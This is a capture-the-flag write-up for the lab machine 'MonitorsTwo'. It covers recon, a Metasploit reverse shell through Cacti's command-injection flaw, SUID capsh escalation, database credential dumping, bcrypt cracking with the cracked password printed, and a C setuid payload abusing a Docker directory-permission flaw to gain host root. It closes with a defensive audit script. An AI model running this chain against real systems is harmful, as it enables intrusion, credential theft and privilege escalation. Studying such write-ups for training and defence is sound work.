MonitorsTwo

Write-up for the HTB machine 'MonitorsTwo'.

1. Initial recon

1.1. nmap

nmap -sC -sV 10.10.11.211

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2. nikto

nikto -host 10.10.11.211

+ Server: nginx/1.18.0 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/7.4.33.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /install/install.php: Install file found.
+ /help.php: A help file was found.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.

1.3. website recon

Nikto's output looks dramatic, but most of it is generic signature noise: nikto itself warns that the server returns valid responses to junk requests, so the WordPress and "backdoor" hits should be treated as false positives until verified by hand. The useful lead is the login page, which identifies the software as Cacti 1.2.22. A quick search for that version turns up an unauthenticated command injection (CVE-2022-46169) with a ready-made Metasploit module.

1.4. msfconsole

In msfconsole run search cacti and select the module by name with use exploit/linux/http/cacti_unauthenticated_cmd_injection (the numeric index shown by search depends on your local module database, so don't rely on use 0).

for the options we want

set rport 80
set rhost 10.10.11.211
set target 0
set lhost YOUR_IP

then exploit

Now we have a reverse shell as www-data. The module is not reliable on every attempt; if no session comes back, run exploit again until one does.

1.5. root?

We can list SUID binaries with:

find / -type f -perm -04000 -ls 2>/dev/null

The output shows the SUID bit set on /sbin/capsh. Following the GTFOBins entry for capsh, /sbin/capsh --gid=0 --uid=0 -- gives us a root shell. But when we look in /root there is nothing there... hmm. The reason becomes clear shortly: this root is inside the Cacti Docker container, not on the host.

2. user.txt

As root we can read the container's start-up script, /entrypoint.sh.

It contains the database connection details (host db, user root, password root), which lets us reset the Cacti admin password directly:

mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET password=md5('admin') where username='admin'"

Cacti still accepts legacy MD5 hashes (it re-hashes them with bcrypt on the next successful login), which is why a plain md5() value is enough. Note the original hash before overwriting it if you want to restore it afterwards.

Now we can log in to the web application as admin with the password admin.

Under Configuration > Users we find a second account, marcus.

2.1. mysql

Taking more inspiration from entrypoint.sh, we can run a few more mysql commands to leak credentials:

mysql --host=db --user=root --password=root cacti -e 'show tables'

lists the tables in the cacti database, and

mysql --host=db --user=root --password=root cacti -e 'select * from user_auth'

dumps every row of user_auth, including the password hashes.

Copy the hash of the user marcus into hash.txt. The $2y$ prefix marks a bcrypt hash, which John the Ripper detects on its own; bcrypt is deliberately slow, so expect the wordlist run to take a while.

$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

This gives us the credentials marcus:funkymonkey.

SSH into the machine as marcus, but keep the Metasploit shell in the container open too; we need it for the root flag.

user.txt can be found in /home/marcus

3. root.txt

After some enumeration of the file system we find an email in /var/mail/marcus that mentions CVE-2021-41091. This is a Docker (Moby) flaw: the data directory under /var/lib/docker is left traversable by unprivileged users on the host, so a local user who knows the path of a container's overlay filesystem can enter it and execute files there, including binaries that root inside the container has made setuid or given file capabilities.

Looking up the CVE we find a proof of concept from CyberArk, which the following steps recreate on this machine.

To recreate this proof of concept for this machine:

  • run findmnt in the marcus terminal

    • it lists the overlay mounts; the one for the container we already have root in is /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged, so cd into that directory (it is the container's root filesystem as seen from the host)

  • now in the root terminal (inside the container) create the following C file as payload.c

/* payload.c: executed by marcus on the host through the container's merged
   directory. The file capabilities set below let setgid(0)/setuid(0) succeed
   without a SUID bit, after which a shell is spawned as root. */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(void) {

    /* switch gid before uid, while CAP_SETGID/CAP_SETUID are still in effect */
    if (setgid(0) != 0) { perror("setgid"); return 1; }
    if (setuid(0) != 0) { perror("setuid"); return 1; }

    /* real, effective and saved ids are all 0 now, so bash keeps them */
    system("/bin/bash");

    return 0;
}

then, still in the container, compile it with gcc payload.c -o payload and grant the binary the capabilities it needs with setcap cap_setgid,cap_setuid+eip payload (the file name must match the compiled binary; getcap payload confirms the capabilities were written).

  • back in the marcus terminal, from the merged directory, simply run ./payload and we are root on the host!
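As an added example (not part of the original write-up or of the CyberArk PoC), the following shell script performs the pre-flight checks behind the procedure above and reuses the SUID sweep from section 1.5: whether the Docker data directory is searchable by other users (the CVE-2021-41091 precondition), which overlay merged directories the current user can actually enter, and which files inside them are SUID or carry file capabilities. It assumes GNU stat/find and a Linux /proc; getcap from libcap is optional. The default /var/lib/docker path and the fixture paths used in testing are assumptions, not the machine's real layout. Run it as marcus on the host.

```shell
#!/bin/sh
# Added example: host-side audit for the CVE-2021-41091 step (not the
# write-up's own code). Assumes GNU coreutils/findutils and Linux /proc.

# 0 = "others" may search (enter) the directory, 1 = they may not, 2 = cannot stat.
others_can_traverse() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 2
    last=$(printf '%s' "$mode" | tail -c 1)   # octal digit for "others"
    [ $(( last & 1 )) -ne 0 ]                 # bit 1 = execute/search
}

# Container root filesystems currently mounted; equivalent to
# `findmnt -t overlay -n -o TARGET`, read straight from /proc.
overlay_merged_dirs() {
    awk '$3 == "overlay" { print $2 }' /proc/self/mounts 2>/dev/null
}

# Regular files below $1 that are SUID or carry file capabilities:
# exactly what a root shell inside the container can plant for us.
find_privileged_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
    if command -v getcap >/dev/null 2>&1; then
        getcap -r "$1" 2>/dev/null
    fi
}

# Full report; $1 overrides the data directory (default /var/lib/docker, assumed).
audit_docker_root() {
    data_dir=${1:-/var/lib/docker}
    others_can_traverse "$data_dir"
    case $? in
        0) echo "[!] $data_dir is searchable by others: CVE-2021-41091 precondition holds" ;;
        1) echo "[+] $data_dir is not searchable by others" ;;
        *) echo "[?] $data_dir: cannot stat" ;;
    esac
    overlay_merged_dirs | while IFS= read -r merged; do
        [ -n "$merged" ] || continue
        # an overlay mounted on / means this shell is itself inside a
        # container, which is not the host-side view this check is about
        [ "$merged" != "/" ] || continue
        if [ -x "$merged" ]; then
            echo "[!] reachable container rootfs: $merged"
            find_privileged_files "$merged" | sed 's/^/      /'
        else
            echo "[+] not reachable from this uid: $merged"
        fi
    done
    return 0
}

audit_docker_root "$@"
```

A patched Docker keeps /var/lib/docker at mode 0710 (owner root), so the first line reports "not searchable"; on a vulnerable host it reports the precondition and then lists, per reachable merged directory, the SUID binaries and capability-bearing files that a container root could have planted, which is the check to run before and after the payload step above.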

root.txt can be found in /root
